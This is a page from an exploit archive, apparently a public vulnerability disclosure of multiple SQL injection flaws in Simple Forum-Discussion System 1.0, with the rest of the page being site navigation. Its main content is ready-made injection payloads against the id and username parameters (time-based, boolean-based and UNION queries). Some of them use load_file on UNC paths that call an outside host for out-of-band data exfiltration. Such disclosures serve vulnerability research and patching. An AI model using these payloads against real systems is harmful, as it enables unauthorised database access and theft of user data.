Simple Forum-Discussion System 1.0 SQL Injection

Simple Forum-Discussion System 1.0 SQL Injection: Posted Dec 13, 2021; Authored by nu11secur1ty; Simple Forum-Discussion System version 1.0 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 17c417dee8f974cab29b5a8669bfe482baabe7a2e668aeb56c7c037db450cdcf; Download | Favorite | View

Simple Forum-Discussion System 1.0 SQL Injection

## [Simple Forum-Discussion System
1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)

## [Vendor](https://www.sourcecodester.com/users/tips23)

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)

## Description:
Multiple SQL-Injections are found on Simple Forum-Discussion System
1.0 For example on three applications which are manage_topic.php,
manage_user.php, and ajax.php. The attacker can be retrieving all
information from the database of this system by using this
vulnerability.


[+]Payloads:

```mysql
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=(select
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))
AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=(select
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))
UNION ALL SELECT
NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--
-
```


```mysql
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM
(SELECT(SLEEP(5)))lewZ)&mtype=own

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-6332 UNION ALL SELECT
CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--
-&mtype=own
```


```mysql
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=GnxaCRMw'+(select
load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''
AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND
'eIbF'='eIbF&password=t4F!v8o!H8
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)

## Proof and Exploit:
[href](https://streamable.com/439w8c)

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 136 files
Jay Turla 111 files
Ubuntu 63 files
Gentoo 33 files
Debian 27 files
sinn3r 23 files
h00die 23 files
Pedro Ribeiro 21 files
juan vazquez 18 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (377)
CentOS (58)
Cisco (1,944)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (386)
iPhone (108)
IRIX (220)
Juniper (70)
Linux (50,966)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,661)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,788)
UNIX (9,443)
UnixWare (187)
Windows (6,732)
Other

Simple Forum-Discussion System 1.0 SQL Injection

Simple Forum-Discussion System 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Simple Forum-Discussion System 1.0 SQL Injection

Share This

Simple Forum-Discussion System 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems